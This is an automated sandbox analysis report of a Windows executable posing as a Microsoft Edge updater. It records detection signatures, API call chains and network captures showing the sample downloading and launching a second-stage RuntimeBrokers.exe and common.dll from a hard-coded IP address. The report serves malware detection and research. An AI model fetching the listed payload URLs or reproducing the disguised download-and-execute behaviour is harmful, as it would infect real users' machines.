Windows Analysis Report
MicrosoftEdgeUpdateSetup.exe

Overview

General Information

Sample name: MicrosoftEdgeUpdateSetup.exe
Analysis ID: 1579412
MD5: e0596bfb4ce5773932f2c2047e2de77b
SHA1: 41120d88d333fad440718a288f29920f040cd832
SHA256: 74a4f68219998688ddd9e14d4a10c6c451cbd77f91f7ea0e27f8dd17f70eeaa9
Tags: exe, user-smica83

Detection

Score: 60
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Suricata IDS alerts for network traffic
AI detected suspicious sample
Found evasive API chain checking for user administrative privileges
Uses known network protocols on non-standard ports
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to communicate with device drivers
Contains functionality to download and execute PE files
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapter information
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Found dropped PE file which has not been started or loaded
Found evaded block containing many API calls
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
PE file contains sections with non-standard names
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

AV Detection

Source: Submitted Sample Integrated Neural Analysis Model: Matched 97.6% probability
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe Code function: 1_2_6C0C6642 CryptReleaseContext, 1_2_6C0C6642
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe Code function: 1_2_6C0C6688 CryptReleaseContext, 1_2_6C0C6688
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe Code function: 1_2_6C0C60AA __EH_prolog3_GS,CryptAcquireContextW,GetLastError, 1_2_6C0C60AA
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe Code function: 1_2_6C157C31 ?VerifyCertInfo@Sys_wrapper@common@ierd_tgp@@SA_NPB_W@Z,__EH_prolog3_GS,memset,memset,lstrcpyW,CryptQueryObject,CryptMsgGetParam,CryptMsgGetParam,LocalAlloc,CryptMsgGetParam,CertFindCertificateInStore,CertGetNameStringA,LocalAlloc,CertGetNameStringW,?get_log_instance@base@@YAPAVILogger@1@XZ,?get_log_instance@base@@YAPAVILogger@1@XZ,GetLastError,LocalFree,?get_log_instance@base@@YAPAVILogger@1@XZ,?get_log_instance@base@@YAPAVILogger@1@XZ,GetLastError,?get_log_instance@base@@YAPAVILogger@1@XZ,GetLastError,?get_log_instance@base@@YAPAVILogger@1@XZ,GetLastError,LocalFree,CertFreeCertificateContext,?get_log_instance@base@@YAPAVILogger@1@XZ,?get_log_instance@base@@YAPAVILogger@1@XZ,GetLastError,?get_log_instance@base@@YAPAVILogger@1@XZ,GetLastError,CertCloseStore,CryptMsgClose, 1_2_6C157C31
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe Code function: 1_2_6C0C381C ?SymEnCrypt@CSymmetryString@ieg_common@@SA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@0PAV34@@Z,?qq_symmetry_encrypt3_len@@YAHH@Z,?oi_symmetry_encrypt2@@YAXPBEH0PAEPAH@Z, 1_2_6C0C381C
Source: RuntimeBrokers.exe, 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmp Binary or memory string: -----BEGIN PUBLIC KEY----- memstr_da8f9787-6
Source: MicrosoftEdgeUpdateSetup.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: MicrosoftEdgeUpdateSetup.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: Binary string: D:\ci_dev\wegame_client\build\bin\Release\tcls_core.pdb source: RuntimeBrokers.exe, 00000001.00000002.2954625279.000000000052E000.00000002.00000001.01000000.00000006.sdmp, RuntimeBrokers.exe, 00000001.00000000.1830246021.000000000052E000.00000002.00000001.01000000.00000006.sdmp, RuntimeBrokers[1].exe.0.dr, RuntimeBrokers.exe.0.dr
Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 /WX -DL_ENDIAN -DOPENSSL_PIC -D_WIN32_WINNT=0x0501 source: RuntimeBrokers.exe, 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmp, common[1].dll.0.dr, common.dll.0.dr
Source: Binary string: keyfuncencryptionPBE2PARAMkeylengthprfPBKDF2PARAMcrypto\asn1\p5_pbev2.ccrypto\evp\p5_crpt2.cassertion failed: keylen <= sizeof(key)crypto\hmac\hmac.ccrypto\pkcs12\p12_key.cxn--compiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 /WX -DL_ENDIAN -DOPENSSL_PIC -D_WIN32_WINNT=0x0501 source: common[1].dll.0.dr, common.dll.0.dr
Source: Binary string: mi_exe_stub.pdb source: MicrosoftEdgeUpdateSetup.exe
Source: Binary string: D:\ci_dev\wegame_client\build\lib\Release\common.pdb source: RuntimeBrokers.exe, 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmp, common[1].dll.0.dr, common.dll.0.dr
Source: Binary string: #lkeyfuncencryptionPBE2PARAMkeylengthprfPBKDF2PARAMcrypto\asn1\p5_pbev2.ccrypto\evp\p5_crpt2.cassertion failed: keylen <= sizeof(key)crypto\hmac\hmac.ccrypto\pkcs12\p12_key.cxn--compiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 /WX -DL_ENDIAN -DOPENSSL_PIC -D_WIN32_WINNT=0x0501 source: RuntimeBrokers.exe, 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmp
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exe Code function: 0_2_0016207E FindFirstFileW,GetSystemTimeAsFileTime,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW, 0_2_0016207E
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exe Code function: 0_2_0016231F FindFirstFileExW,GetSystemTimeAsFileTime,FindNextFileW,FindClose, 0_2_0016231F
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe Code function: 1_2_00484A62 FindFirstFileW,MoveFileExW,CopyFileW,FindNextFileW,FindClose, 1_2_00484A62
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe Code function: 1_2_0046CDBA FindFirstFileW,_wcsrchr,_wcsrchr,DeleteFileW,FindNextFileW,FindClose, 1_2_0046CDBA
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe Code function: 1_2_00468440 GetLogicalDriveStringsW,QueryDosDeviceW, 1_2_00468440

Networking

Source: Network traffic Suricata IDS: 2022050 - Severity 1 - ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 : 154.82.68.34:16653 -> 192.168.2.4:49730
Source: Network traffic Suricata IDS: 2022051 - Severity 1 - ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 : 154.82.68.34:16653 -> 192.168.2.4:49730
Source: unknown Network traffic detected: HTTP traffic on port 49730 -> 16653
Source: unknown Network traffic detected: HTTP traffic on port 16653 -> 49730
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exe Code function: 0_2_00166690 URLDownloadToFileA,URLDownloadToFileA,ShellExecuteA,exit, 0_2_00166690
Source: global traffic TCP traffic: 192.168.2.4:49730 -> 154.82.68.34:16653
Source: global traffic TCP traffic: 192.168.2.4:49731 -> 134.122.134.93:8852
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Sun, 22 Dec 2024 07:37:06 GMTContent-Type: application/octet-streamContent-Length: 1770080Last-Modified: Wed, 18 Dec 2024 05:31:28 GMTConnection: keep-aliveETag: "67625e30-1b0260"Accept-Ranges: bytes
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Sun, 22 Dec 2024 07:37:11 GMTContent-Type: application/octet-streamContent-Length: 3925088Last-Modified: Wed, 18 Dec 2024 05:31:28 GMTConnection: keep-aliveETag: "67625e30-3be460"Accept-Ranges: bytes
Source: Joe Sandbox View ASN Name: ROOTNETWORKSUS ROOTNETWORKSUS
Source: global traffic HTTP traffic detected: GET /RuntimeBrokers.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 154.82.68.34:16653Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /common.dll HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 154.82.68.34:16653Connection: Keep-Alive
Source: unknown TCP traffic detected without corresponding DNS query: 154.82.68.34
Source: MicrosoftEdgeUpdateSetup.exe, 00000000.00000003.1765185057.0000000002BE6000.00000004.00000020.00020000.00000000.sdmp, MicrosoftEdgeUpdateSetup.exe, 00000000.00000003.1828495142.0000000002BE6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://154.82.68.34/
Source: MicrosoftEdgeUpdateSetup.exe, 00000000.00000003.1765185057.0000000002BE6000.00000004.00000020.00020000.00000000.sdmp, MicrosoftEdgeUpdateSetup.exe, 00000000.00000003.1828495142.0000000002BE6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://154.82.68.34/32
Source: MicrosoftEdgeUpdateSetup.exe, 00000000.00000003.1765185057.0000000002BE6000.00000004.00000020.00020000.00000000.sdmp, MicrosoftEdgeUpdateSetup.exe, 00000000.00000002.1830730229.0000000002BBE000.00000004.00000020.00020000.00000000.sdmp, MicrosoftEdgeUpdateSetup.exe, 00000000.00000003.1828495142.0000000002BE6000.00000004.00000020.00020000.00000000.sdmp, MicrosoftEdgeUpdateSetup.exe, 00000000.00000003.1765224276.0000000002C39000.00000004.00000020.00020000.00000000.sdmp, MicrosoftEdgeUpdateSetup.exe, 00000000.00000003.1765148514.0000000002C33000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://154.82.68.34:16653/RuntimeBrokers.exe
Source: MicrosoftEdgeUpdateSetup.exe, 00000000.00000003.1765185057.0000000002BE6000.00000004.00000020.00020000.00000000.sdmp, MicrosoftEdgeUpdateSetup.exe, 00000000.00000002.1830730229.0000000002BE3000.00000004.00000020.00020000.00000000.sdmp, MicrosoftEdgeUpdateSetup.exe, 00000000.00000003.1828495142.0000000002BE6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://154.82.68.34:16653/RuntimeBrokers.exe)Ce
Source: MicrosoftEdgeUpdateSetup.exe, 00000000.00000003.1765185057.0000000002BE6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://154.82.68.34:16653/RuntimeBrokers.exe2j
Source: MicrosoftEdgeUpdateSetup.exe, 00000000.00000003.1765224276.0000000002C39000.00000004.00000020.00020000.00000000.sdmp, MicrosoftEdgeUpdateSetup.exe, 00000000.00000003.1765148514.0000000002C33000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://154.82.68.34:16653/RuntimeBrokers.exeC:
Source: MicrosoftEdgeUpdateSetup.exe, 00000000.00000003.1765185057.0000000002BE6000.00000004.00000020.00020000.00000000.sdmp, MicrosoftEdgeUpdateSetup.exe, 00000000.00000002.1830730229.0000000002BE3000.00000004.00000020.00020000.00000000.sdmp, MicrosoftEdgeUpdateSetup.exe, 00000000.00000003.1828495142.0000000002BE6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://154.82.68.34:16653/RuntimeBrokers.exea
Source: MicrosoftEdgeUpdateSetup.exe, 00000000.00000003.1765185057.0000000002BE6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://154.82.68.34:16653/RuntimeBrokers.exeg
Source: MicrosoftEdgeUpdateSetup.exe, 00000000.00000003.1828443097.0000000002C1C000.00000004.00000020.00020000.00000000.sdmp, MicrosoftEdgeUpdateSetup.exe, 00000000.00000003.1828495142.0000000002BE6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://154.82.68.34:16653/common.dll
Source: MicrosoftEdgeUpdateSetup.exe, 00000000.00000003.1828495142.0000000002BE6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://154.82.68.34:16653/common.dllAppData
Source: MicrosoftEdgeUpdateSetup.exe, 00000000.00000003.1828495142.0000000002BE6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://154.82.68.34:16653/common.dllFt
Source: MicrosoftEdgeUpdateSetup.exe, 00000000.00000003.1828443097.0000000002C1C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://154.82.68.34:16653/common.dllS
Source: MicrosoftEdgeUpdateSetup.exe, 00000000.00000003.1828404553.0000000002C4F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://154.82.68.34:16653/common.dllSSC:
Source: MicrosoftEdgeUpdateSetup.exe, 00000000.00000003.1828495142.0000000002BE6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://154.82.68.34:16653/common.dlldllLMEMP
Source: MicrosoftEdgeUpdateSetup.exe, 00000000.00000003.1828443097.0000000002C1C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://154.82.68.34:16653/common.dlloC:
Source: MicrosoftEdgeUpdateSetup.exe, 00000000.00000002.1830730229.0000000002C18000.00000004.00000020.00020000.00000000.sdmp, MicrosoftEdgeUpdateSetup.exe, 00000000.00000003.1828443097.0000000002C1C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://154.82.68.34:16653/common.dllr
Source: common[1].dll.0.dr, RuntimeBrokers[1].exe.0.dr, RuntimeBrokers.exe.0.dr, common.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: common[1].dll.0.dr, RuntimeBrokers[1].exe.0.dr, RuntimeBrokers.exe.0.dr, common.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: common[1].dll.0.dr, RuntimeBrokers[1].exe.0.dr, RuntimeBrokers.exe.0.dr, common.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: MicrosoftEdgeUpdateSetup.exe, 00000000.00000003.1828443097.0000000002C3A000.00000004.00000020.00020000.00000000.sdmp, MicrosoftEdgeUpdateSetup.exe, 00000000.00000003.1828495142.0000000002BE6000.00000004.00000020.00020000.00000000.sdmp, common[1].dll.0.dr, RuntimeBrokers[1].exe.0.dr, RuntimeBrokers.exe.0.dr, common.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: common[1].dll.0.dr, RuntimeBrokers[1].exe.0.dr, RuntimeBrokers.exe.0.dr, common.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: MicrosoftEdgeUpdateSetup.exe, 00000000.00000003.1765185057.0000000002BE6000.00000004.00000020.00020000.00000000.sdmp, MicrosoftEdgeUpdateSetup.exe, 00000000.00000003.1765224276.0000000002C39000.00000004.00000020.00020000.00000000.sdmp, MicrosoftEdgeUpdateSetup.exe, 00000000.00000003.1765148514.0000000002C33000.00000004.00000020.00020000.00000000.sdmp, common[1].dll.0.dr, RuntimeBrokers[1].exe.0.dr, RuntimeBrokers.exe.0.dr, common.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: common[1].dll.0.dr, RuntimeBrokers[1].exe.0.dr, RuntimeBrokers.exe.0.dr, common.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: common.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: MicrosoftEdgeUpdateSetup.exe, 00000000.00000003.1765185057.0000000002BE6000.00000004.00000020.00020000.00000000.sdmp, MicrosoftEdgeUpdateSetup.exe, 00000000.00000003.1765224276.0000000002C39000.00000004.00000020.00020000.00000000.sdmp, MicrosoftEdgeUpdateSetup.exe, 00000000.00000003.1765148514.0000000002C33000.00000004.00000020.00020000.00000000.sdmp, common[1].dll.0.dr, RuntimeBrokers[1].exe.0.dr, RuntimeBrokers.exe.0.dr, common.dll.0.dr String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: RuntimeBrokers.exe, RuntimeBrokers.exe, 00000001.00000002.2954625279.000000000052E000.00000002.00000001.01000000.00000006.sdmp, RuntimeBrokers.exe, 00000001.00000000.1830246021.000000000052E000.00000002.00000001.01000000.00000006.sdmp, RuntimeBrokers[1].exe.0.dr, RuntimeBrokers.exe.0.dr String found in binary or memory: http://lol.qq.com/client/client.shtml?uin=%u&area=%u&timestamp=%u&Signature=%s
Source: common[1].dll.0.dr, RuntimeBrokers[1].exe.0.dr, RuntimeBrokers.exe.0.dr, common.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0
Source: MicrosoftEdgeUpdateSetup.exe, 00000000.00000003.1828443097.0000000002C3A000.00000004.00000020.00020000.00000000.sdmp, MicrosoftEdgeUpdateSetup.exe, 00000000.00000003.1828495142.0000000002BE6000.00000004.00000020.00020000.00000000.sdmp, common[1].dll.0.dr, RuntimeBrokers[1].exe.0.dr, RuntimeBrokers.exe.0.dr, common.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0A
Source: common[1].dll.0.dr, RuntimeBrokers[1].exe.0.dr, RuntimeBrokers.exe.0.dr, common.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0C
Source: common[1].dll.0.dr, RuntimeBrokers[1].exe.0.dr, RuntimeBrokers.exe.0.dr, common.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0X
Source: MicrosoftEdgeUpdateSetup.exe, 00000000.00000003.1765185057.0000000002BE6000.00000004.00000020.00020000.00000000.sdmp, common[1].dll.0.dr, RuntimeBrokers[1].exe.0.dr, RuntimeBrokers.exe.0.dr, common.dll.0.dr String found in binary or memory: http://www.digicert.com/CPS0
Source: RuntimeBrokers.exe, RuntimeBrokers.exe, 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmp, common[1].dll.0.dr, common.dll.0.dr String found in binary or memory: https://curl.haxx.se/docs/http-cookies.html
Source: MicrosoftEdgeUpdateSetup.exe, 00000000.00000002.1830730229.0000000002C18000.00000004.00000020.00020000.00000000.sdmp, MicrosoftEdgeUpdateSetup.exe, 00000000.00000003.1765148514.0000000002C1C000.00000004.00000020.00020000.00000000.sdmp, MicrosoftEdgeUpdateSetup.exe, 00000000.00000003.1828443097.0000000002C1C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe Code function: 1_2_6C103E77: CreateFileW,GetLastError,??0path@filesystem@ierd_tgp@@QAE@$$QAV012@@Z,CloseHandle,DeviceIoControl,GetLastError,??0path@filesystem@ierd_tgp@@QAE@$$QAV012@@Z,CloseHandle, 1_2_6C103E77
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exe Code function: 0_2_001788FD 0_2_001788FD
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exe Code function: 0_2_0016D145 0_2_0016D145
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exe Code function: 0_2_0017726C 0_2_0017726C
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exe Code function: 0_2_00175308 0_2_00175308
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exe Code function: 0_2_0017738C 0_2_0017738C
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exe Code function: 0_2_001674A9 0_2_001674A9
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exe Code function: 0_2_00174E70 0_2_00174E70
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe Code function: 1_2_0043E17A 1_2_0043E17A
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe Code function: 1_2_004DE490 1_2_004DE490
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe Code function: 1_2_004F459C 1_2_004F459C
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe Code function: 1_2_004D4710 1_2_004D4710
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe Code function: 1_2_0044C93C 1_2_0044C93C
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe Code function: 1_2_004C49A9 1_2_004C49A9
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe Code function: 1_2_004B0A40 1_2_004B0A40
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe Code function: 1_2_004C4BD8 1_2_004C4BD8
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe Code function: 1_2_004B0BE2 1_2_004B0BE2
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe Code function: 1_2_00504BE0 1_2_00504BE0
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe Code function: 1_2_004C5041 1_2_004C5041
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe Code function: 1_2_004DF3AA 1_2_004DF3AA
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe Code function: 1_2_0043D4F3 1_2_0043D4F3
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe Code function: 1_2_004C5996 1_2_004C5996
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe Code function: 1_2_004D5BA0 1_2_004D5BA0
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe Code function: 1_2_004C5E5F 1_2_004C5E5F
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe Code function: 1_2_00505EF0 1_2_00505EF0
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe Code function: 1_2_6C0A6D10 1_2_6C0A6D10
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe Code function: 1_2_6C16677A 1_2_6C16677A
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe Code function: 1_2_6C0C7E9A 1_2_6C0C7E9A
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exe Code function: String function: 001689D0 appears 33 times
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe Code function: String function: 0046C76B appears 157 times
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe Code function: String function: 00409053 appears 52 times
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe Code function: String function: 0046C66E appears 138 times
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe Code function: String function: 6C1C2F1B appears 334 times
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe Code function: String function: 6C1C2F4F appears 207 times
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe Code function: String function: 6C0BE945 appears 154 times
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe Code function: String function: 004AF019 appears 74 times
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe Code function: String function: 6C1C2F86 appears 82 times
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe Code function: String function: 00508550 appears 34 times
Source: MicrosoftEdgeUpdateSetup.exe Static PE information: invalid certificate
Source: MicrosoftEdgeUpdateSetup.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: RuntimeBrokers.exe.0.dr Binary string: GetNativeSystemInfokernel32IsWow64Processkernel32\Device\HarddiskVolume:[KillAllProcess]create snapshot fail[KillAllProcess]process: [KillAllProcess]kill failed
Source: common.dll.0.dr Binary string: [Sys_wrapper]WritePrivateProfile fail, session:{}, key:{}, file:{}NtSuspendProcessntdllNtResumeProcess[Sys_wrapper]GetStrValueFromReg, open reg key failed, key:{}, error:{}[Sys_wrapper]GetStrValueFromReg, get reg value failed, key:{}, value_name:{}, error:{}[Sys_wrapper]GetStrValueFromReg, invalid size[Sys_wrapper]SetRegValue, open reg path failed, path:{}, error:{}[Sys_wrapper]SetRegValue, set reg value failed, path:{}, value_name:{}, value:{}, error:{}[Sys_wrapper]ACLineStatus:{},BatteryFlag:{}kernel32\Device\HarddiskVolume\\.\PhysicalDrive%dA:\%SystemDrive%\ :TENINSTIPGlobal\%s_%X_%dd:\ci_dev\wegame_client\dependences\tpf_for_tgp_sdk\include\teniobase\template\processhelp_t.h[ProcessHelp][RetrieveGameImagePathByProcessId]MapViewOfFile fail, hListMap:%p, err:%d[ProcessHelp][RetrieveGameImagePathByProcessId]OpenFileMappingA fail, iamge path:%s, err:%dH:3
Source: classification engine Classification label: mal60.troj.evad.winEXE@3/4@0/2
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exe Code function: 0_2_00163E83 GetLastError,SetLastError,FormatMessageW,GetLastError,SetLastError,LocalFree, 0_2_00163E83
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exe Code function: 0_2_00161F55 SHGetKnownFolderPath,GetDiskFreeSpaceExW,CoTaskMemFree, 0_2_00161F55
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe Code function: 1_2_0047C0FD CreateToolhelp32Snapshot,Process32FirstW,OpenProcess,GetProcessImageFileNameW,CloseHandle,Process32NextW,CloseHandle, 1_2_0047C0FD
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe Code function: 1_2_6C156FE1 ?TaskBarPin@Sys_wrapper@common@ierd_tgp@@SA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@_N@Z,__EH_prolog3_GS,?IsWin10_OS@Sys_wrapper@common@ierd_tgp@@SA_NXZ,ShellExecuteW,GetCurrentProcess,?ChangeProcessImageName@Sys_wrapper@common@ierd_tgp@@SA_NPAXABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@Z,CoInitialize,memset,LoadLibraryW,LoadStringW,CoCreateInstance,memset,wcscpy_s,PathRemoveFileSpecW,wcscpy_s,PathStripPathW,SysFreeString,VariantClear,VarBstrCmp,SysFreeString,SysFreeString,SysFreeString,VariantClear,CoUninitialize,FreeLibrary, 1_2_6C156FE1
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exe Code function: 0_2_001627A1 FindResourceW,SizeofResource, 0_2_001627A1
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exe File created: C:\Program Files (x86)\Microsoft\Temp\EUF98A.tmp
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\RuntimeBrokers[1].exe
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exe Mutant created: NULL
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exe File created: C:\Program Files (x86)\Microsoft\Temp\EUF98A.tmp
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exe Command line argument: kernel32.dll 0_2_00163109
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exe Command line argument: async 0_2_00163109
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exe Command line argument: /%s 0_2_00163109
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exe Command line argument: /%s 0_2_00163109
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exe Command line argument: asyncupdate 0_2_00163109
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exe Command line argument: /%s 0_2_00163109
Source: MicrosoftEdgeUpdateSetup.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exe File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: RuntimeBrokers.exe String found in binary or memory: -launcher
Source: MicrosoftEdgeUpdateSetup.exe String found in binary or memory: %1!s!-Installationsprogramm
Source: MicrosoftEdgeUpdateSetup.exe String found in binary or memory: r das %1!s!-Installationsprogramm ist Windows 2000 Service Pack 4 oder h
Source: MicrosoftEdgeUpdateSetup.exe String found in binary or memory: %1!s!-installeerder
Source: MicrosoftEdgeUpdateSetup.exe String found in binary or memory: Onbekende InstalleerderfoutTKon nie installeer nie. %1!s!-installeerder vereis Windows 2000 Dienspak 4 of beter.PAMicrosoft
Source: MicrosoftEdgeUpdateSetup.exe String found in binary or memory: ruf fl-Installatur _L-installazzjoni ma rnexxietx. %1!s! Installatur je'
